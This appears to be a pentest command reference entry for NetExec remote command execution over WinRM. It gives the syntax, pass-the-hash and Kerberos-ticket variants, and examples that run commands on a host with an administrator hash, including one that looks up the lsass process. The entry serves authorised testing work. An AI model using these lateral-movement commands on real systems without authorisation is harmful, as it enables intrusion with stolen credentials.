NetExec WinRM Command Execution

Execute a command on a Windows host over WinRM (PowerShell Remoting). Use -X for PowerShell scriptblocks.

Tool
nxc
Category
Lateral Movement / Remote Shells
Platform
linux
Requires
password
Protocols
WINRM

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

nxc winrm <ip> -u <user> -p <password> -x '<command>'

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

nxc winrm <ip> -u <user> -H <hash> -x '<command>'

PowerShell Block requires password

nxc winrm <ip> -u <user> -p <password> -X '<powershell>'

Kerberos (ccache) requires Kerberos ticket

KRB5CCNAME=<ccache> nxc winrm <ip> -u <user> -k --use-kcache -x '<command>'

Examples

nxc winrm 10.10.10.10 -u administrator -p 'Password123!' -x 'whoami /all'
nxc winrm 10.10.10.10 -u admin -H :e19ccf75ee54e06b06a5907af13cef42 -X 'Get-Process | Where-Object {$_.Name -like "*lsass*"}'

Tags

nxc netexec winrm execution lateral-movement

References